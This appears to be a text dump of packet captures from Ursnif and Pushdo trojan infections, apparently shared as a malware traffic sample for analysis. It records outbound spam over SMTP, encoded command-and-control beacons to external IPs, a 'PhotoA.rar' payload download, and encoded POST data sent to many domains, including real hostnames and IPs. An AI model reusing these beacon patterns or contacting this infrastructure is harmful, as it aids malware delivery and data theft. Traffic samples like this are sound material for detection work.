2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org
RCPT TO:libreoffice@lists.freedesktop.org

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
E..(…………
..e….]`.=…aP…….
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
E..e……y.Y.D.
..e….(st..uP.P…….220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
E..E..@…A.
..eY.D……uP.(st.P….l..EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
E..(……y.Y.D.
..e….(st..uP.P…….
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
E………y9Y.D.
..e….(st..uP.P…….250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org
E..W..@…A.
..eY.D……uP.(sutP..&….MAIL FROM:postmaster@global.libreoffice.org

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
E..(……y.Y.D.
..e….(sut.uQ.P….<..
2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6……y.Y.D.
..e….(sut.uQ.P…s…250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org
E..T..@…A.
..eY.D……uQ.(su.P….2..RCPT TO:marketing@global.libreoffice.org

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
E..(……y.Y.D.
..e….(su..uQ2P…….
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
E..r……yxY.D.
..e….(su..uQ2P….e..450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
E..(……48.F(g
..e…;….D…P…]…
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
E..q.*@….C
..e.F(g.;..D…….P…….CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
E..(……47.F(g
..e…;….D..5P…]z..
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
E..v.+@….=
..e.F(g.;..D..5….P…FB..E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
E..(……46.F(g
..e…;….D…P…],..
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
E..v.,@….<
..e.F(g.;..D…….P….*..VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
E..(……45.F(g
..e…;….D…P……
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
E..v.-@….;
..e.F(g.;..D…….P….O..ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
E..(……44.F(g
..e…;….D…P……
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
E..w..@….9
..e.F(g.;..D…….P…l…2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
E..(……43.F(g
..e…;….D..nP…\A..
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
E..Y./@….V
..e.F(g.;..D..n….P…….Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
E..(……42.F(g
..e…;….D…P……
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
E..>.0@….p
..e.F(g.;..D…….P….s..WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
E..(……41.F(g
..e…;….D…P…[…
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw
E..4.1@….y
..e.F(g.;..D…….P…….fFly N+umw

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….Co8FRj6uTHdUAWhlgWreY51ooBHc1MWFrjvK6UUn5eAL9/xk0x24lVA/OPovbIZimxhyf3PCWxCWdHw0bQPPXEDYj6hRW7fZPMXzJZYAOcHFhAI5fdYIaQCYggVaYGuOqc0Zd91kKpapMNSUbz75oGEAeP/Zi52AlzLKtinJugHJfmiQb8427B7+PIWoRUhYZYBpyo49e/rhwaDlMpQl
SWuPZ/paqVnte83KWzj4/X8cH7CE4sckayWIntW8xeow9bvOffNMmaQrD5Bw+T9SE2CovTyZxej65akzcJAdEmd5uqXXU4qBkJvk50qT8tArWpv/y3DXZ5JdCTUhtF4q8IIuiq7P89s1SiQqGrMZXimGuCp9HA9uL8lmXOV0+frB9lFker1nkrtJZzEI6KdKO7iCGgXpu/blj/FQe/ztkEZ9UmCHI5vlDYOdYKMi6Jo
gZfdkZTISsrYWcnY1mIrGs1LRcfrckFrOES3prQ/EfNANOL9MhzmfRwvY+ZBpyQMWrDFtGpM+h9Sw2emgfWFtdLRV6g5mDEvuyteyAY3Z9tggaeq4kqdc5YHUXHyA82g5Zy46VbsrgfWE7tyyJAV7JMZ0yNqxF/oTd2JqKxgypPb1EL0M94CmmXnPOZALL7lwcUF7wcp8gp2I9RsfvN2em+T9MbY1PaKHr77+9m7T7z
GyBdWE1H2W1j2J/HIqwe9Z4JuMV1ZXSrwldKYpl1UaGBU8+T/s8Dzwwk7WOO/FybjcTO+D9lZVUX0Mq34j7avx3gbU2dTAKaAhfRwJ72MCq/UgaowkMk60Y7eMIc8IrRJ4e0/RzU/o82BGuG2mYkLNsL58cl5KB+/c7Nr2G08h5kZ08pVHMA2MBmHw4ugLOzb5xLjQG6f5Tsaq
X1kBbojRReBfy4NhzI9gQ5lfi6
gJkxWovKr4Btyy840zDiJMTR+IqCC9YLr1RyAZiKu19vtqrapY/RD5SG7zAQBVgUOJlKfV+HnVhxiN2haFhif2ZaAe5ADAzdiiOO4SLrus3RTwUETUOulf2pjdQaoDZJzqZ7xqDy28WVRasqO2Uy7w/ElhUNdOT7EXkBhvznV2PcBLjtkpai8/1fiRlPG9alpuXyMdbPOTcnNonbbwvIgpX1oQWmlCL3PVrmVfuQ3vB
dQKVKY5RkFJO0qSzkm8zSWe8YOTUC8LPDE8Ni58m/8ZNjQlaxECbeFIiTJO3Xa6S4dtq5odlHslN8XE4JE2/mmIzb3vYXVR6srXxKWm2O5GBkYcKaq6NtDvnoaeRuzXwlLsKovhbqUHWiSdQe/EBuq0IEYFpc15Qgm3QgCQ7u6fuKqohRadP0vvzb3zgJ0bOwfNOypnsLt4AnOsgxZofDVtiM81JYRCCD+Jo6pOJqWd
IQYawzJb1gfNL5gGH3/JSS1xLyiZ483xa/BDtgvU5Uz0jjCGjURD+S2P69TlL0eQ66ntI1D8/

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z…
2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….4m{.L
..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: "e60124-3eea3-58ecd5e2cfdc0"
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com…..
2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33)
E..=……Z.
..e…….5.)..O…………www.pr-park.com…..
2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32)
E..<./….Z.
..e…….5.(..o@………..www.2print.com…..
2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31)
E..;.1….Z.
..e…….5.’.k………….www.crcsi.org…..
2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33)
E..=.2….Z.
..e…….5.).PFJ………..www.spanesi.com…..
2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33)
E..=.3….Y.
..e…..v.5.).A………….www.owsports.ca…..
2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31)
E..;.4….Z.
..e…..T.5.’……………www.rs-ag.com…..
2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30)
E..:.5….Z.
..e…….5.&…0………..www.c9dd.com…..
2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33)
E..=.6….Y.
..e…….5.))…………..www.udesign.biz…..
2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34)
E..>.7….Y.
..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... .................
2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].s..........
..e.5...I$..............www.udesign.biz..................i.@.............i.@
2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.9@....u
..e.i.@.a.P.......... .................
2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204)
E....t..........
..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y
2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@…..
..eh….d.P…B…… ……………..
2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a.......
2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0
E..(.>@....
..eh..V.b.P…&D;”.P…y…
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache


2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
